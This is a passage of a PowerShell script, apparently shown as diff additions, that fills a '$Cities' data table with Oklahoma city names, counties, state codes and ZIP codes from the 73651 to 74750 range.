$Cities.Rows.Add("Hobart","Kiowa","Oklahoma","OK","40","73651") + $null = $Cities.Rows.Add("Leedey","Dewey","Oklahoma","OK","40","73654") + $null = $Cities.Rows.Add("Lone wolf","Kiowa","Oklahoma","OK","40","73655") + $null = $Cities.Rows.Add("Eagle city","Dewey","Oklahoma","OK","40","73658") + $null = $Cities.Rows.Add("Putnam","Dewey","Oklahoma","OK","40","73659") + $null = $Cities.Rows.Add("Reydon","Roger Mills","Oklahoma","OK","40","73660") + $null = $Cities.Rows.Add("Rocky","Washita","Oklahoma","OK","40","73661") + $null = $Cities.Rows.Add("Sayre","Beckham","Oklahoma","OK","40","73662") + $null = $Cities.Rows.Add("Seiling","Dewey","Oklahoma","OK","40","73663") + $null = $Cities.Rows.Add("Sentinel","Washita","Oklahoma","OK","40","73664") + $null = $Cities.Rows.Add("Sweetwater","Roger Mills","Oklahoma","OK","40","73666") + $null = $Cities.Rows.Add("Taloga","Dewey","Oklahoma","OK","40","73667") + $null = $Cities.Rows.Add("Texola","Beckham","Oklahoma","OK","40","73668") + $null = $Cities.Rows.Add("Thomas","Custer","Oklahoma","OK","40","73669") + $null = $Cities.Rows.Add("Willow","Greer","Oklahoma","OK","40","73673") + $null = $Cities.Rows.Add("Zcta 736hh","Beckham","Oklahoma","OK","40","736HH") + $null = $Cities.Rows.Add("Zcta 736xx","Beckham","Oklahoma","OK","40","736XX") + $null = $Cities.Rows.Add("Enid","Garfield","Oklahoma","OK","40","73701") + $null = $Cities.Rows.Add("Enid","Garfield","Oklahoma","OK","40","73703") + $null = $Cities.Rows.Add("Aline","Alfalfa","Oklahoma","OK","40","73716") + $null = $Cities.Rows.Add("Alva","Woods","Oklahoma","OK","40","73717") + $null = $Cities.Rows.Add("Ames","Major","Oklahoma","OK","40","73718") + $null = $Cities.Rows.Add("Amorita","Alfalfa","Oklahoma","OK","40","73719") + $null = $Cities.Rows.Add("Bison","Garfield","Oklahoma","OK","40","73720") + $null = $Cities.Rows.Add("Burlington","Alfalfa","Oklahoma","OK","40","73722") + $null = $Cities.Rows.Add("Canton","Blaine","Oklahoma","OK","40","73724") + $null = $Cities.Rows.Add("Carmen","Alfalfa","Oklahoma","OK","40","73726") + $null = $Cities.Rows.Add("Carrier","Garfield","Oklahoma","OK","40","73727") + $null = $Cities.Rows.Add("Cherokee","Alfalfa","Oklahoma","OK","40","73728") + $null = $Cities.Rows.Add("Cleo springs","Major","Oklahoma","OK","40","73729") + $null = $Cities.Rows.Add("Covington","Garfield","Oklahoma","OK","40","73730") + $null = $Cities.Rows.Add("Dacoma","Woods","Oklahoma","OK","40","73731") + $null = $Cities.Rows.Add("Douglas","Garfield","Oklahoma","OK","40","73733") + $null = $Cities.Rows.Add("Dover","Kingfisher","Oklahoma","OK","40","73734") + $null = $Cities.Rows.Add("Drummond","Garfield","Oklahoma","OK","40","73735") + $null = $Cities.Rows.Add("Fairmont","Garfield","Oklahoma","OK","40","73736") + $null = $Cities.Rows.Add("Orienta","Major","Oklahoma","OK","40","73737") + $null = $Cities.Rows.Add("Garber","Garfield","Oklahoma","OK","40","73738") + $null = $Cities.Rows.Add("Goltry","Alfalfa","Oklahoma","OK","40","73739") + $null = $Cities.Rows.Add("Helena","Alfalfa","Oklahoma","OK","40","73741") + $null = $Cities.Rows.Add("Hennessey","Kingfisher","Oklahoma","OK","40","73742") + $null = $Cities.Rows.Add("Hillsdale","Garfield","Oklahoma","OK","40","73743") + $null = $Cities.Rows.Add("Hitchcock","Blaine","Oklahoma","OK","40","73744") + $null = $Cities.Rows.Add("Hopeton","Woods","Oklahoma","OK","40","73746") + $null = $Cities.Rows.Add("Isabella","Major","Oklahoma","OK","40","73747") + $null = $Cities.Rows.Add("Jet","Alfalfa","Oklahoma","OK","40","73749") + $null = $Cities.Rows.Add("Kingfisher","Kingfisher","Oklahoma","OK","40","73750") + $null = $Cities.Rows.Add("Kremlin","Garfield","Oklahoma","OK","40","73753") + $null = $Cities.Rows.Add("Lahoma","Garfield","Oklahoma","OK","40","73754") + $null = $Cities.Rows.Add("Longdale","Blaine","Oklahoma","OK","40","73755") + $null = $Cities.Rows.Add("Loyal","Kingfisher","Oklahoma","OK","40","73756") + $null = $Cities.Rows.Add("Lucien","Noble","Oklahoma","OK","40","73757") + $null = $Cities.Rows.Add("Manchester","Grant","Oklahoma","OK","40","73758") + $null = $Cities.Rows.Add("Medford","Grant","Oklahoma","OK","40","73759") + $null = $Cities.Rows.Add("Meno","Major","Oklahoma","OK","40","73760") + $null = $Cities.Rows.Add("Nash","Grant","Oklahoma","OK","40","73761") + $null = $Cities.Rows.Add("Okarche","Kingfisher","Oklahoma","OK","40","73762") + $null = $Cities.Rows.Add("Okeene","Blaine","Oklahoma","OK","40","73763") + $null = $Cities.Rows.Add("Omega","Kingfisher","Oklahoma","OK","40","73764") + $null = $Cities.Rows.Add("Pond creek","Grant","Oklahoma","OK","40","73766") + $null = $Cities.Rows.Add("Ringwood","Major","Oklahoma","OK","40","73768") + $null = $Cities.Rows.Add("Wakita","Grant","Oklahoma","OK","40","73771") + $null = $Cities.Rows.Add("Watonga","Blaine","Oklahoma","OK","40","73772") + $null = $Cities.Rows.Add("Waukomis","Garfield","Oklahoma","OK","40","73773") + $null = $Cities.Rows.Add("Zcta 737hh","Blaine","Oklahoma","OK","40","737HH") + $null = $Cities.Rows.Add("Woodward","Woodward","Oklahoma","OK","40","73801") + $null = $Cities.Rows.Add("Woodward","Woodward","Oklahoma","OK","40","73802") + $null = $Cities.Rows.Add("Harmon","Ellis","Oklahoma","OK","40","73832") + $null = $Cities.Rows.Add("Selman","Harper","Oklahoma","OK","40","73834") + $null = $Cities.Rows.Add("Camargo","Dewey","Oklahoma","OK","40","73835") + $null = $Cities.Rows.Add("Chester","Major","Oklahoma","OK","40","73838") + $null = $Cities.Rows.Add("Fargo","Ellis","Oklahoma","OK","40","73840") + $null = $Cities.Rows.Add("Fort supply","Woodward","Oklahoma","OK","40","73841") + $null = $Cities.Rows.Add("Freedom","Woods","Oklahoma","OK","40","73842") + $null = $Cities.Rows.Add("Gage","Ellis","Oklahoma","OK","40","73843") + $null = $Cities.Rows.Add("Gate","Beaver","Oklahoma","OK","40","73844") + $null = $Cities.Rows.Add("Knowles","Beaver","Oklahoma","OK","40","73847") + $null = $Cities.Rows.Add("Laverne","Harper","Oklahoma","OK","40","73848") + $null = $Cities.Rows.Add("May","Harper","Oklahoma","OK","40","73851") + $null = $Cities.Rows.Add("Mooreland","Woodward","Oklahoma","OK","40","73852") + $null = $Cities.Rows.Add("Mutual","Woodward","Oklahoma","OK","40","73853") + $null = $Cities.Rows.Add("Rosston","Harper","Oklahoma","OK","40","73855") + $null = $Cities.Rows.Add("Sharon","Woodward","Oklahoma","OK","40","73857") + $null = $Cities.Rows.Add("Shattuck","Ellis","Oklahoma","OK","40","73858") + $null = $Cities.Rows.Add("Vici","Dewey","Oklahoma","OK","40","73859") + $null = $Cities.Rows.Add("Waynoka","Woods","Oklahoma","OK","40","73860") + $null = $Cities.Rows.Add("Zcta 738hh","Beaver","Oklahoma","OK","40","738HH") + $null = $Cities.Rows.Add("Zcta 738xx","Beaver","Oklahoma","OK","40","738XX") + $null = $Cities.Rows.Add("Adams","Texas","Oklahoma","OK","40","73901") + $null = $Cities.Rows.Add("Balko","Beaver","Oklahoma","OK","40","73931") + $null = $Cities.Rows.Add("Elmwood","Beaver","Oklahoma","OK","40","73932") + $null = $Cities.Rows.Add("Boise city","Cimarron","Oklahoma","OK","40","73933") + $null = $Cities.Rows.Add("Felt","Cimarron","Oklahoma","OK","40","73937") + $null = $Cities.Rows.Add("Forgan","Beaver","Oklahoma","OK","40","73938") + $null = $Cities.Rows.Add("Goodwell","Texas","Oklahoma","OK","40","73939") + $null = $Cities.Rows.Add("Guymon","Texas","Oklahoma","OK","40","73942") + $null = $Cities.Rows.Add("Hardesty","Texas","Oklahoma","OK","40","73944") + $null = $Cities.Rows.Add("Optima","Texas","Oklahoma","OK","40","73945") + $null = $Cities.Rows.Add("Kenton","Cimarron","Oklahoma","OK","40","73946") + $null = $Cities.Rows.Add("Keyes","Cimarron","Oklahoma","OK","40","73947") + $null = $Cities.Rows.Add("Texhoma","Texas","Oklahoma","OK","40","73949") + $null = $Cities.Rows.Add("Baker","Beaver","Oklahoma","OK","40","73950") + $null = $Cities.Rows.Add("Tyrone","Texas","Oklahoma","OK","40","73951") + $null = $Cities.Rows.Add("Zcta 739hh","Cimarron","Oklahoma","OK","40","739HH") + $null = $Cities.Rows.Add("Zcta 739xx","Cimarron","Oklahoma","OK","40","739XX") + $null = $Cities.Rows.Add("Avant","Osage","Oklahoma","OK","40","74001") + $null = $Cities.Rows.Add("Barnsdall","Osage","Oklahoma","OK","40","74002") + $null = $Cities.Rows.Add("Bartlesville","Washington","Oklahoma","OK","40","74003") + $null = $Cities.Rows.Add("Bartlesville","Washington","Oklahoma","OK","40","74006") + $null = $Cities.Rows.Add("Bixby","Tulsa","Oklahoma","OK","40","74008") + $null = $Cities.Rows.Add("Bristow","Creek","Oklahoma","OK","40","74010") + $null = $Cities.Rows.Add("Broken arrow","Tulsa","Oklahoma","OK","40","74011") + $null = $Cities.Rows.Add("Broken arrow","Tulsa","Oklahoma","OK","40","74012") + $null = $Cities.Rows.Add("Broken arrow","Wagoner","Oklahoma","OK","40","74014") + $null = $Cities.Rows.Add("Catoosa","Rogers","Oklahoma","OK","40","74015") + $null = $Cities.Rows.Add("Chelsea","Rogers","Oklahoma","OK","40","74016") + $null = $Cities.Rows.Add("Claremore","Rogers","Oklahoma","OK","40","74017") + $null = $Cities.Rows.Add("Cleveland","Pawnee","Oklahoma","OK","40","74020") + $null = $Cities.Rows.Add("Collinsville","Tulsa","Oklahoma","OK","40","74021") + $null = $Cities.Rows.Add("Copan","Washington","Oklahoma","OK","40","74022") + $null = $Cities.Rows.Add("Cushing","Payne","Oklahoma","OK","40","74023") + $null = $Cities.Rows.Add("Davenport","Lincoln","Oklahoma","OK","40","74026") + $null = $Cities.Rows.Add("Delaware","Nowata","Oklahoma","OK","40","74027") + $null = $Cities.Rows.Add("Depew","Creek","Oklahoma","OK","40","74028") + $null = $Cities.Rows.Add("Dewey","Washington","Oklahoma","OK","40","74029") + $null = $Cities.Rows.Add("Drumright","Creek","Oklahoma","OK","40","74030") + $null = $Cities.Rows.Add("Glencoe","Payne","Oklahoma","OK","40","74032") + $null = $Cities.Rows.Add("Glenpool","Tulsa","Oklahoma","OK","40","74033") + $null = $Cities.Rows.Add("Hallett","Pawnee","Oklahoma","OK","40","74034") + $null = $Cities.Rows.Add("Hominy","Osage","Oklahoma","OK","40","74035") + $null = $Cities.Rows.Add("Inola","Rogers","Oklahoma","OK","40","74036") + $null = $Cities.Rows.Add("Jenks","Tulsa","Oklahoma","OK","40","74037") + $null = $Cities.Rows.Add("Jennings","Pawnee","Oklahoma","OK","40","74038") + $null = $Cities.Rows.Add("Kellyville","Creek","Oklahoma","OK","40","74039") + $null = $Cities.Rows.Add("Kiefer","Creek","Oklahoma","OK","40","74041") + $null = $Cities.Rows.Add("Lenapah","Nowata","Oklahoma","OK","40","74042") + $null = $Cities.Rows.Add("Mannford","Creek","Oklahoma","OK","40","74044") + $null = $Cities.Rows.Add("Maramec","Pawnee","Oklahoma","OK","40","74045") + $null = $Cities.Rows.Add("Mounds","Okmulgee","Oklahoma","OK","40","74047") + $null = $Cities.Rows.Add("Nowata","Nowata","Oklahoma","OK","40","74048") + $null = $Cities.Rows.Add("Oakhurst","Creek","Oklahoma","OK","40","74050") + $null = $Cities.Rows.Add("Ochelata","Washington","Oklahoma","OK","40","74051") + $null = $Cities.Rows.Add("Oilton","Creek","Oklahoma","OK","40","74052") + $null = $Cities.Rows.Add("Oologah","Rogers","Oklahoma","OK","40","74053") + $null = $Cities.Rows.Add("Osage","Osage","Oklahoma","OK","40","74054") + $null = $Cities.Rows.Add("Owasso","Tulsa","Oklahoma","OK","40","74055") + $null = $Cities.Rows.Add("Pawhuska","Osage","Oklahoma","OK","40","74056") + $null = $Cities.Rows.Add("Pawnee","Pawnee","Oklahoma","OK","40","74058") + $null = $Cities.Rows.Add("Perkins","Payne","Oklahoma","OK","40","74059") + $null = $Cities.Rows.Add("Prue","Osage","Oklahoma","OK","40","74060") + $null = $Cities.Rows.Add("Ramona","Washington","Oklahoma","OK","40","74061") + $null = $Cities.Rows.Add("Ripley","Payne","Oklahoma","OK","40","74062") + $null = $Cities.Rows.Add("Sand springs","Tulsa","Oklahoma","OK","40","74063") + $null = $Cities.Rows.Add("Sapulpa","Creek","Oklahoma","OK","40","74066") + $null = $Cities.Rows.Add("Shamrock","Creek","Oklahoma","OK","40","74068") + $null = $Cities.Rows.Add("Skiatook","Osage","Oklahoma","OK","40","74070") + $null = $Cities.Rows.Add("Slick","Creek","Oklahoma","OK","40","74071") + $null = $Cities.Rows.Add("S coffeyville","Nowata","Oklahoma","OK","40","74072") + $null = $Cities.Rows.Add("Sperry","Tulsa","Oklahoma","OK","40","74073") + $null = $Cities.Rows.Add("Stillwater","Payne","Oklahoma","OK","40","74074") + $null = $Cities.Rows.Add("Stillwater","Payne","Oklahoma","OK","40","74075") + $null = $Cities.Rows.Add("Kendrick","Lincoln","Oklahoma","OK","40","74079") + $null = $Cities.Rows.Add("Talala","Rogers","Oklahoma","OK","40","74080") + $null = $Cities.Rows.Add("Terlton","Pawnee","Oklahoma","OK","40","74081") + $null = $Cities.Rows.Add("Wann","Nowata","Oklahoma","OK","40","74083") + $null = $Cities.Rows.Add("Wynona","Osage","Oklahoma","OK","40","74084") + $null = $Cities.Rows.Add("Yale","Payne","Oklahoma","OK","40","74085") + $null = $Cities.Rows.Add("Zcta 740hh","Creek","Oklahoma","OK","40","740HH") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74103") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74104") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74105") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74106") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74107") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74108") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74110") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74112") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74114") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74115") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74116") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74117") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74119") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74120") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74126") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74127") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74128") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74129") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74130") + $null = $Cities.Rows.Add("Tulsa","Creek","Oklahoma","OK","40","74131") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74132") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74133") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74134") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74135") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74136") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74137") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74145") + $null = $Cities.Rows.Add("Tulsa","Tulsa","Oklahoma","OK","40","74146") + $null = $Cities.Rows.Add("Vinita","Craig","Oklahoma","OK","40","74301") + $null = $Cities.Rows.Add("Adair","Mayes","Oklahoma","OK","40","74330") + $null = $Cities.Rows.Add("Bernice","Delaware","Oklahoma","OK","40","74331") + $null = $Cities.Rows.Add("Big cabin","Craig","Oklahoma","OK","40","74332") + $null = $Cities.Rows.Add("Bluejacket","Craig","Oklahoma","OK","40","74333") + $null = $Cities.Rows.Add("Cardin","Ottawa","Oklahoma","OK","40","74335") + $null = $Cities.Rows.Add("Chouteau","Mayes","Oklahoma","OK","40","74337") + $null = $Cities.Rows.Add("Colcord","Delaware","Oklahoma","OK","40","74338") + $null = $Cities.Rows.Add("Commerce","Ottawa","Oklahoma","OK","40","74339") + $null = $Cities.Rows.Add("Disney","Delaware","Oklahoma","OK","40","74340") + $null = $Cities.Rows.Add("Eucha","Delaware","Oklahoma","OK","40","74342") + $null = $Cities.Rows.Add("Fairland","Ottawa","Oklahoma","OK","40","74343") + $null = $Cities.Rows.Add("Grove","Delaware","Oklahoma","OK","40","74344") + $null = $Cities.Rows.Add("Jay","Delaware","Oklahoma","OK","40","74346") + $null = $Cities.Rows.Add("Kansas","Delaware","Oklahoma","OK","40","74347") + $null = $Cities.Rows.Add("Ketchum","Craig","Oklahoma","OK","40","74349") + $null = $Cities.Rows.Add("Langley","Mayes","Oklahoma","OK","40","74350") + $null = $Cities.Rows.Add("Locust grove","Mayes","Oklahoma","OK","40","74352") + $null = $Cities.Rows.Add("Miami","Ottawa","Oklahoma","OK","40","74354") + $null = $Cities.Rows.Add("North miami","Ottawa","Oklahoma","OK","40","74358") + $null = $Cities.Rows.Add("Picher","Ottawa","Oklahoma","OK","40","74360") + $null = $Cities.Rows.Add("Pryor","Mayes","Oklahoma","OK","40","74361") + $null = $Cities.Rows.Add("Quapaw","Ottawa","Oklahoma","OK","40","74363") + $null = $Cities.Rows.Add("Leach","Delaware","Oklahoma","OK","40","74364") + $null = $Cities.Rows.Add("Salina","Mayes","Oklahoma","OK","40","74365") + $null = $Cities.Rows.Add("Spavinaw","Mayes","Oklahoma","OK","40","74366") + $null = $Cities.Rows.Add("Strang","Mayes","Oklahoma","OK","40","74367") + $null = $Cities.Rows.Add("Twin oaks","Delaware","Oklahoma","OK","40","74368") + $null = $Cities.Rows.Add("Welch","Craig","Oklahoma","OK","40","74369") + $null = $Cities.Rows.Add("Wyandotte","Ottawa","Oklahoma","OK","40","74370") + $null = $Cities.Rows.Add("Zcta 743hh","Delaware","Oklahoma","OK","40","743HH") + $null = $Cities.Rows.Add("Muskogee","Muskogee","Oklahoma","OK","40","74401") + $null = $Cities.Rows.Add("Muskogee","Muskogee","Oklahoma","OK","40","74403") + $null = $Cities.Rows.Add("Beggs","Okmulgee","Oklahoma","OK","40","74421") + $null = $Cities.Rows.Add("Boynton","Muskogee","Oklahoma","OK","40","74422") + $null = $Cities.Rows.Add("Braggs","Muskogee","Oklahoma","OK","40","74423") + $null = $Cities.Rows.Add("Canadian","Pittsburg","Oklahoma","OK","40","74425") + $null = $Cities.Rows.Add("Checotah","McIntosh","Oklahoma","OK","40","74426") + $null = $Cities.Rows.Add("Cookson","Cherokee","Oklahoma","OK","40","74427") + $null = $Cities.Rows.Add("Council hill","McIntosh","Oklahoma","OK","40","74428") + $null = $Cities.Rows.Add("Coweta","Wagoner","Oklahoma","OK","40","74429") + $null = $Cities.Rows.Add("Crowder","Pittsburg","Oklahoma","OK","40","74430") + $null = $Cities.Rows.Add("Dewar","Okmulgee","Oklahoma","OK","40","74431") + $null = $Cities.Rows.Add("Eufaula","McIntosh","Oklahoma","OK","40","74432") + $null = $Cities.Rows.Add("Fort gibson","Muskogee","Oklahoma","OK","40","74434") + $null = $Cities.Rows.Add("Gore","Sequoyah","Oklahoma","OK","40","74435") + $null = $Cities.Rows.Add("Haskell","Muskogee","Oklahoma","OK","40","74436") + $null = $Cities.Rows.Add("Hoffman","Okmulgee","Oklahoma","OK","40","74437") + $null = $Cities.Rows.Add("Hitchita","McIntosh","Oklahoma","OK","40","74438") + $null = $Cities.Rows.Add("Hoyt","Haskell","Oklahoma","OK","40","74440") + $null = $Cities.Rows.Add("Hulbert","Cherokee","Oklahoma","OK","40","74441") + $null = $Cities.Rows.Add("Indianola","Pittsburg","Oklahoma","OK","40","74442") + $null = $Cities.Rows.Add("Moodys","Cherokee","Oklahoma","OK","40","74444") + $null = $Cities.Rows.Add("Morris","Okmulgee","Oklahoma","OK","40","74445") + $null = $Cities.Rows.Add("Okay","Wagoner","Oklahoma","OK","40","74446") + $null = $Cities.Rows.Add("Okmulgee","Okmulgee","Oklahoma","OK","40","74447") + $null = $Cities.Rows.Add("Oktaha","Muskogee","Oklahoma","OK","40","74450") + $null = $Cities.Rows.Add("Park hill","Cherokee","Oklahoma","OK","40","74451") + $null = $Cities.Rows.Add("Peggs","Cherokee","Oklahoma","OK","40","74452") + $null = $Cities.Rows.Add("Porter","Wagoner","Oklahoma","OK","40","74454") + $null = $Cities.Rows.Add("Porum","Muskogee","Oklahoma","OK","40","74455") + $null = $Cities.Rows.Add("Preston","Okmulgee","Oklahoma","OK","40","74456") + $null = $Cities.Rows.Add("Proctor","Adair","Oklahoma","OK","40","74457") + $null = $Cities.Rows.Add("Rentiesville","McIntosh","Oklahoma","OK","40","74459") + $null = $Cities.Rows.Add("Schulter","Okmulgee","Oklahoma","OK","40","74460") + $null = $Cities.Rows.Add("Stidham","McIntosh","Oklahoma","OK","40","74461") + $null = $Cities.Rows.Add("Stigler","Haskell","Oklahoma","OK","40","74462") + $null = $Cities.Rows.Add("Taft","Muskogee","Oklahoma","OK","40","74463") + $null = $Cities.Rows.Add("Tahlequah","Cherokee","Oklahoma","OK","40","74464") + $null = $Cities.Rows.Add("Wagoner","Wagoner","Oklahoma","OK","40","74467") + $null = $Cities.Rows.Add("Wainwright","Muskogee","Oklahoma","OK","40","74468") + $null = $Cities.Rows.Add("Warner","Muskogee","Oklahoma","OK","40","74469") + $null = $Cities.Rows.Add("Webbers falls","Muskogee","Oklahoma","OK","40","74470") + $null = $Cities.Rows.Add("Welling","Cherokee","Oklahoma","OK","40","74471") + $null = $Cities.Rows.Add("Whitefield","Haskell","Oklahoma","OK","40","74472") + $null = $Cities.Rows.Add("Zcta 744hh","Cherokee","Oklahoma","OK","40","744HH") + $null = $Cities.Rows.Add("Zcta 744xx","Cherokee","Oklahoma","OK","40","744XX") + $null = $Cities.Rows.Add("Mcalester","Pittsburg","Oklahoma","OK","40","74501") + $null = $Cities.Rows.Add("Albion","Pushmataha","Oklahoma","OK","40","74521") + $null = $Cities.Rows.Add("Alderson","Pittsburg","Oklahoma","OK","40","74522") + $null = $Cities.Rows.Add("Antlers","Pushmataha","Oklahoma","OK","40","74523") + $null = $Cities.Rows.Add("Atoka","Atoka","Oklahoma","OK","40","74525") + $null = $Cities.Rows.Add("Blanco","Pittsburg","Oklahoma","OK","40","74528") + $null = $Cities.Rows.Add("Bromide","Johnston","Oklahoma","OK","40","74530") + $null = $Cities.Rows.Add("Calvin","Hughes","Oklahoma","OK","40","74531") + $null = $Cities.Rows.Add("Caney","Atoka","Oklahoma","OK","40","74533") + $null = $Cities.Rows.Add("Centrahoma","Coal","Oklahoma","OK","40","74534") + $null = $Cities.Rows.Add("Clarita","Coal","Oklahoma","OK","40","74535") + $null = $Cities.Rows.Add("Clayton","Pushmataha","Oklahoma","OK","40","74536") + $null = $Cities.Rows.Add("Coalgate","Coal","Oklahoma","OK","40","74538") + $null = $Cities.Rows.Add("Daisy","Atoka","Oklahoma","OK","40","74540") + $null = $Cities.Rows.Add("Finley","Pushmataha","Oklahoma","OK","40","74543") + $null = $Cities.Rows.Add("Gowen","Latimer","Oklahoma","OK","40","74545") + $null = $Cities.Rows.Add("Haileyville","Pittsburg","Oklahoma","OK","40","74546") + $null = $Cities.Rows.Add("Hartshorne","Pittsburg","Oklahoma","OK","40","74547") + $null = $Cities.Rows.Add("Honobia","Pushmataha","Oklahoma","OK","40","74549") + $null = $Cities.Rows.Add("Kinta","Haskell","Oklahoma","OK","40","74552") + $null = $Cities.Rows.Add("Kiowa","Pittsburg","Oklahoma","OK","40","74553") + $null = $Cities.Rows.Add("Krebs","Pittsburg","Oklahoma","OK","40","74554") + $null = $Cities.Rows.Add("Lane","Atoka","Oklahoma","OK","40","74555") + $null = $Cities.Rows.Add("Lehigh","Coal","Oklahoma","OK","40","74556") + $null = $Cities.Rows.Add("Moyers","Pushmataha","Oklahoma","OK","40","74557") + $null = $Cities.Rows.Add("Nashoba","Pushmataha","Oklahoma","OK","40","74558") + $null = $Cities.Rows.Add("Pittsburg","Pittsburg","Oklahoma","OK","40","74560") + $null = $Cities.Rows.Add("Quinton","Pittsburg","Oklahoma","OK","40","74561") + $null = $Cities.Rows.Add("Rattan","Pushmataha","Oklahoma","OK","40","74562") + $null = $Cities.Rows.Add("Red oak","Latimer","Oklahoma","OK","40","74563") + $null = $Cities.Rows.Add("Savanna","Pittsburg","Oklahoma","OK","40","74565") + $null = $Cities.Rows.Add("Snow","Pushmataha","Oklahoma","OK","40","74567") + $null = $Cities.Rows.Add("Stringtown","Atoka","Oklahoma","OK","40","74569") + $null = $Cities.Rows.Add("Stuart","Hughes","Oklahoma","OK","40","74570") + $null = $Cities.Rows.Add("Talihina","Le Flore","Oklahoma","OK","40","74571") + $null = $Cities.Rows.Add("Tupelo","Coal","Oklahoma","OK","40","74572") + $null = $Cities.Rows.Add("Tuskahoma","Pushmataha","Oklahoma","OK","40","74574") + $null = $Cities.Rows.Add("Wardville","Atoka","Oklahoma","OK","40","74576") + $null = $Cities.Rows.Add("Whitesboro","Le Flore","Oklahoma","OK","40","74577") + $null = $Cities.Rows.Add("Wilburton","Latimer","Oklahoma","OK","40","74578") + $null = $Cities.Rows.Add("Zcta 745hh","Atoka","Oklahoma","OK","40","745HH") + $null = $Cities.Rows.Add("Zcta 745xx","Pushmataha","Oklahoma","OK","40","745XX") + $null = $Cities.Rows.Add("Ponca city","Kay","Oklahoma","OK","40","74601") + $null = $Cities.Rows.Add("Ponca city","Kay","Oklahoma","OK","40","74604") + $null = $Cities.Rows.Add("Billings","Noble","Oklahoma","OK","40","74630") + $null = $Cities.Rows.Add("Blackwell","Kay","Oklahoma","OK","40","74631") + $null = $Cities.Rows.Add("Braman","Kay","Oklahoma","OK","40","74632") + $null = $Cities.Rows.Add("Burbank","Osage","Oklahoma","OK","40","74633") + $null = $Cities.Rows.Add("Deer creek","Grant","Oklahoma","OK","40","74636") + $null = $Cities.Rows.Add("Fairfax","Osage","Oklahoma","OK","40","74637") + $null = $Cities.Rows.Add("Hunter","Garfield","Oklahoma","OK","40","74640") + $null = $Cities.Rows.Add("Kaw city","Kay","Oklahoma","OK","40","74641") + $null = $Cities.Rows.Add("Lamont","Grant","Oklahoma","OK","40","74643") + $null = $Cities.Rows.Add("Marland","Noble","Oklahoma","OK","40","74644") + $null = $Cities.Rows.Add("Nardin","Kay","Oklahoma","OK","40","74646") + $null = $Cities.Rows.Add("Peckham","Kay","Oklahoma","OK","40","74647") + $null = $Cities.Rows.Add("Ralston","Pawnee","Oklahoma","OK","40","74650") + $null = $Cities.Rows.Add("Red rock","Noble","Oklahoma","OK","40","74651") + $null = $Cities.Rows.Add("Foraker","Osage","Oklahoma","OK","40","74652") + $null = $Cities.Rows.Add("Tonkawa","Kay","Oklahoma","OK","40","74653") + $null = $Cities.Rows.Add("Zcta 746hh","Grant","Oklahoma","OK","40","746HH") + $null = $Cities.Rows.Add("Durant","Bryan","Oklahoma","OK","40","74701") + $null = $Cities.Rows.Add("Achille","Bryan","Oklahoma","OK","40","74720") + $null = $Cities.Rows.Add("Albany","Bryan","Oklahoma","OK","40","74721") + $null = $Cities.Rows.Add("Battiest","McCurtain","Oklahoma","OK","40","74722") + $null = $Cities.Rows.Add("Bennington","Bryan","Oklahoma","OK","40","74723") + $null = $Cities.Rows.Add("Bethel","McCurtain","Oklahoma","OK","40","74724") + $null = $Cities.Rows.Add("Bokchito","Bryan","Oklahoma","OK","40","74726") + $null = $Cities.Rows.Add("Boswell","Choctaw","Oklahoma","OK","40","74727") + $null = $Cities.Rows.Add("Broken bow","McCurtain","Oklahoma","OK","40","74728") + $null = $Cities.Rows.Add("Caddo","Bryan","Oklahoma","OK","40","74729") + $null = $Cities.Rows.Add("Calera","Bryan","Oklahoma","OK","40","74730") + $null = $Cities.Rows.Add("Cartwright","Bryan","Oklahoma","OK","40","74731") + $null = $Cities.Rows.Add("Colbert","Bryan","Oklahoma","OK","40","74733") + $null = $Cities.Rows.Add("Eagletown","McCurtain","Oklahoma","OK","40","74734") + $null = $Cities.Rows.Add("Fort towson","Choctaw","Oklahoma","OK","40","74735") + $null = $Cities.Rows.Add("Garvin","McCurtain","Oklahoma","OK","40","74736") + $null = $Cities.Rows.Add("Golden","McCurtain","Oklahoma","OK","40","74737") + $null = $Cities.Rows.Add("Grant","Choctaw","Oklahoma","OK","40","74738") + $null = $Cities.Rows.Add("Tom","McCurtain","Oklahoma","OK","40","74740") + $null = $Cities.Rows.Add("Hendrix","Bryan","Oklahoma","OK","40","74741") + $null = $Cities.Rows.Add("Hugo","Choctaw","Oklahoma","OK","40","74743") + $null = $Cities.Rows.Add("Idabel","McCurtain","Oklahoma","OK","40","74745") + $null = $Cities.Rows.Add("Kemp","Bryan","Oklahoma","OK","40","74747") + $null = $Cities.Rows.Add("Kenefic","Johnston","Oklahoma","OK","40","74748") + $null = $Cities.Rows.Add("Millerton","McCurtain","Oklahoma","OK","40","74750") + $null = 